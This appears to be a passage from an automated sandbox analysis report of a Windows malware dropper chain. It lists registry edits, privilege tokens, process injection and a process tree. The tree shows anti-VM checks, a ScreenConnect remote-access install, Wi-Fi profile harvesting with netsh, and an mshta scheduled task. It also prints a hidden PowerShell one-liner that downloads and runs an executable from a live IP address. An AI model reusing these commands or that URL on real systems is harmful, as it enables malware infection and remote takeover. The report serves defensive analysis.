description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-caf207c0cf87587b\shell\open msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-caf207c0cf87587b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (caf207c0cf87587b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-caf207c0cf87587b msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-caf207c0cf87587b\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-5032-305FB19B91C6} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-5032-305FB19B91C6}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (caf207c0cf87587b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E89030319865B4844DC3C0F0611A9184\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\Version = "402849799" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\caf207c0cf87587b\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\caf207c0cf87587b\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-5032-305FB19B91C6}\ = "ScreenConnect Client (caf207c0cf87587b) Credential Provider" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E89030319865B4844DC3C0F0611A9184 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\PackageCode = "E89030319865B4844DC3C0F0611A9184" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\1ED88C20AA0BC736AC2F700CFC7885B7 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-caf207c0cf87587b\URL Protocol msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-caf207c0cf87587b\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-caf207c0cf87587b\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\ProductIcon = "C:\\Windows\\Installer\\{1303098E-5689-484B-D43C-0C0F16A11948}\\DefaultIcon" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\1ED88C20AA0BC736AC2F700CFC7885B7\E89030319865B4844DC3C0F0611A9184 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\SourceList\Net msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-caf207c0cf87587b\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-caf207c0cf87587b msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-5032-305FB19B91C6}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\ProductName = "ScreenConnect Client (caf207c0cf87587b)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-5032-305FB19B91C6}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ ipKwUq9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E89030319865B4844DC3C0F0611A9184\SourceList\Media\1 = ";" msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5412 schtasks.exe 1636 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3340 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2100 1C08r9.exe 2100 1C08r9.exe 1784 rapes.exe 1784 rapes.exe 2644 2z6185.exe 2644 2z6185.exe 2644 2z6185.exe 2644 2z6185.exe 2644 2z6185.exe 2644 2z6185.exe 3208 79IPEWNE3VYWXIRFO98X.exe 3208 79IPEWNE3VYWXIRFO98X.exe 4932 3i59G.exe 4932 3i59G.exe 4932 3i59G.exe 4932 3i59G.exe 4932 3i59G.exe 4932 3i59G.exe 1988 chrome.exe 1988 chrome.exe 6056 HHPgDSI.exe 6056 HHPgDSI.exe 6056 HHPgDSI.exe 6056 HHPgDSI.exe 4932 3i59G.exe 4932 3i59G.exe 4932 3i59G.exe 4932 3i59G.exe 5736 msedge.exe 5736 msedge.exe 4212 msedge.exe 4212 msedge.exe 3996 msedge.exe 3996 msedge.exe 3996 msedge.exe 3996 msedge.exe 3996 msedge.exe 3996 msedge.exe 3996 msedge.exe 3996 msedge.exe 1952 cuFIzyH.exe 1952 cuFIzyH.exe 1952 cuFIzyH.exe 1952 cuFIzyH.exe 1952 cuFIzyH.exe 1952 cuFIzyH.exe 4932 3i59G.exe 4932 3i59G.exe 5844 rapes.exe 5844 rapes.exe 5980 iZ73hNr.exe 5980 iZ73hNr.exe 5980 iZ73hNr.exe 5980 iZ73hNr.exe 5840 ._cache_ipKwUq9.exe 5840 ._cache_ipKwUq9.exe 5840 ._cache_ipKwUq9.exe 5840 ._cache_ipKwUq9.exe 5840 ._cache_ipKwUq9.exe 3104 ._cache_Synaptics.exe 3104 ._cache_Synaptics.exe 3104 ._cache_Synaptics.exe 3104 ._cache_Synaptics.exe 3104 ._cache_Synaptics.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 4212 msedge.exe 4212 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1988 chrome.exe Token: SeCreatePagefilePrivilege 1988 chrome.exe Token: SeShutdownPrivilege 1988 chrome.exe Token: SeCreatePagefilePrivilege 1988 chrome.exe Token: SeShutdownPrivilege 1988 chrome.exe Token: SeCreatePagefilePrivilege 1988 chrome.exe Token: SeShutdownPrivilege 1988 chrome.exe Token: SeCreatePagefilePrivilege 1988 chrome.exe Token: SeShutdownPrivilege 1988 chrome.exe Token: SeCreatePagefilePrivilege 1988 chrome.exe Token: SeShutdownPrivilege 1988 chrome.exe Token: SeCreatePagefilePrivilege 1988 chrome.exe Token: SeShutdownPrivilege 1988 chrome.exe Token: SeCreatePagefilePrivilege 1988 chrome.exe Token: SeShutdownPrivilege 1988 chrome.exe Token: SeCreatePagefilePrivilege 1988 chrome.exe Token: SeDebugPrivilege 2520 vKdwCHJ.exe Token: SeShutdownPrivilege 5032 msiexec.exe Token: SeIncreaseQuotaPrivilege 5032 msiexec.exe Token: SeSecurityPrivilege 2692 msiexec.exe Token: SeCreateTokenPrivilege 5032 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5032 msiexec.exe Token: SeLockMemoryPrivilege 5032 msiexec.exe Token: SeIncreaseQuotaPrivilege 5032 msiexec.exe Token: SeMachineAccountPrivilege 5032 msiexec.exe Token: SeTcbPrivilege 5032 msiexec.exe Token: SeSecurityPrivilege 5032 msiexec.exe Token: SeTakeOwnershipPrivilege 5032 msiexec.exe Token: SeLoadDriverPrivilege 5032 msiexec.exe Token: SeSystemProfilePrivilege 5032 msiexec.exe Token: SeSystemtimePrivilege 5032 msiexec.exe Token: SeProfSingleProcessPrivilege 5032 msiexec.exe Token: SeIncBasePriorityPrivilege 5032 msiexec.exe Token: SeCreatePagefilePrivilege 5032 msiexec.exe Token: SeCreatePermanentPrivilege 5032 msiexec.exe Token: SeBackupPrivilege 5032 msiexec.exe Token: SeRestorePrivilege 5032 msiexec.exe Token: SeShutdownPrivilege 5032 msiexec.exe Token: SeDebugPrivilege 5032 msiexec.exe Token: SeAuditPrivilege 5032 msiexec.exe Token: SeSystemEnvironmentPrivilege 5032 msiexec.exe Token: SeChangeNotifyPrivilege 5032 msiexec.exe Token: SeRemoteShutdownPrivilege 5032 msiexec.exe Token: SeUndockPrivilege 5032 msiexec.exe Token: SeSyncAgentPrivilege 5032 msiexec.exe Token: SeEnableDelegationPrivilege 5032 msiexec.exe Token: SeManageVolumePrivilege 5032 msiexec.exe Token: SeImpersonatePrivilege 5032 msiexec.exe Token: SeCreateGlobalPrivilege 5032 msiexec.exe Token: SeCreateTokenPrivilege 5032 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5032 msiexec.exe Token: SeLockMemoryPrivilege 5032 msiexec.exe Token: SeIncreaseQuotaPrivilege 5032 msiexec.exe Token: SeMachineAccountPrivilege 5032 msiexec.exe Token: SeTcbPrivilege 5032 msiexec.exe Token: SeSecurityPrivilege 5032 msiexec.exe Token: SeTakeOwnershipPrivilege 5032 msiexec.exe Token: SeLoadDriverPrivilege 5032 msiexec.exe Token: SeSystemProfilePrivilege 5032 msiexec.exe Token: SeSystemtimePrivilege 5032 msiexec.exe Token: SeProfSingleProcessPrivilege 5032 msiexec.exe Token: SeIncBasePriorityPrivilege 5032 msiexec.exe Token: SeCreatePagefilePrivilege 5032 msiexec.exe Token: SeCreatePermanentPrivilege 5032 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2100 1C08r9.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 1988 chrome.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 4212 msedge.exe 5032 msiexec.exe 5032 msiexec.exe 2632 499ecee7cb.exe 2632 499ecee7cb.exe 2632 499ecee7cb.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 2632 499ecee7cb.exe 2632 499ecee7cb.exe 2632 499ecee7cb.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 4696 5a290de29e.exe 4696 5a290de29e.exe 4696 5a290de29e.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 3340 EXCEL.EXE 3340 EXCEL.EXE 3340 EXCEL.EXE 3340 EXCEL.EXE 3340 EXCEL.EXE 3340 EXCEL.EXE 3340 EXCEL.EXE 3340 EXCEL.EXE 5416 ScreenConnect.WindowsBackstageShell.exe 5768 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4420 wrote to memory of 2456 4420 040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe 87 PID 4420 wrote to memory of 2456 4420 040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe 87 PID 4420 wrote to memory of 2456 4420 040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe 87 PID 2456 wrote to memory of 2100 2456 q5e62.exe 89 PID 2456 wrote to memory of 2100 2456 q5e62.exe 89 PID 2456 wrote to memory of 2100 2456 q5e62.exe 89 PID 2100 wrote to memory of 1784 2100 1C08r9.exe 91 PID 2100 wrote to memory of 1784 2100 1C08r9.exe 91 PID 2100 wrote to memory of 1784 2100 1C08r9.exe 91 PID 2456 wrote to memory of 2644 2456 q5e62.exe 92 PID 2456 wrote to memory of 2644 2456 q5e62.exe 92 PID 2456 wrote to memory of 2644 2456 q5e62.exe 92 PID 2644 wrote to memory of 3208 2644 2z6185.exe 98 PID 2644 wrote to memory of 3208 2644 2z6185.exe 98 PID 2644 wrote to memory of 3208 2644 2z6185.exe 98 PID 4420 wrote to memory of 4932 4420 040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe 99 PID 4420 wrote to memory of 4932 4420 040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe 99 PID 4420 wrote to memory of 4932 4420 040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe 99 PID 4932 wrote to memory of 1988 4932 3i59G.exe 102 PID 4932 wrote to memory of 1988 4932 3i59G.exe 102 PID 1988 wrote to memory of 5092 1988 chrome.exe 103 PID 1988 wrote to memory of 5092 1988 chrome.exe 103 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2456 1988 chrome.exe 104 PID 1988 wrote to memory of 2652 1988 chrome.exe 105 PID 1988 wrote to memory of 2652 1988 chrome.exe 105 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 PID 1988 wrote to memory of 1328 1988 chrome.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe"C:\Users\Admin\AppData\Local\Temp\040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\q5e62.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\q5e62.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1C08r9.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1C08r9.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6056
-
-
C:\Users\Admin\AppData\Local\Temp\10148930101\vKdwCHJ.exe"C:\Users\Admin\AppData\Local\Temp\10148930101\vKdwCHJ.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2520 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\caf207c0cf87587b\ScreenConnect.ClientSetup.msi"6⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5032
-
-
-
C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe"C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
-
C:\Users\Admin\AppData\Local\Temp\10157290101\ipKwUq9.exe"C:\Users\Admin\AppData\Local\Temp\10157290101\ipKwUq9.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5644 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\._cache_ipKwUq9.exe"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\._cache_ipKwUq9.exe"6⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5840 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All7⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5636 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:3168
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3064
-
-
C:\Windows\SysWOW64\findstr.exefindstr All8⤵
- System Location Discovery: System Language Discovery
PID:1328
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid7⤵
- System Location Discovery: System Language Discovery
PID:3512 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵PID:5664
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5208
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\._cache_Synaptics.exe" InjUpdate7⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3104 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All8⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4968 -
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile9⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5944
-
-
C:\Windows\SysWOW64\findstr.exefindstr All9⤵
- System Location Discovery: System Language Discovery
PID:3416
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid8⤵
- System Location Discovery: System Language Discovery
PID:5904 -
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
- System Location Discovery: System Language Discovery
PID:5620
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid9⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3488
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5892 -
C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5980
-
-
-
C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3512 -
C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5520
-
-
-
C:\Users\Admin\AppData\Local\Temp\10165740101\499ecee7cb.exe"C:\Users\Admin\AppData\Local\Temp\10165740101\499ecee7cb.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2632 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Qx0ZdmaCjZb /tr "mshta C:\Users\Admin\AppData\Local\Temp\RpKn15mIS.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
PID:1528 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Qx0ZdmaCjZb /tr "mshta C:\Users\Admin\AppData\Local\Temp\RpKn15mIS.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5412
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\RpKn15mIS.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
PID:5396 -
C:\Users\Admin\AppData\Local\TempWKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE"C:\Users\Admin\AppData\Local\TempWKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1500
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10165750121\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
PID:2292 -
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:6136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5740
-
-
-
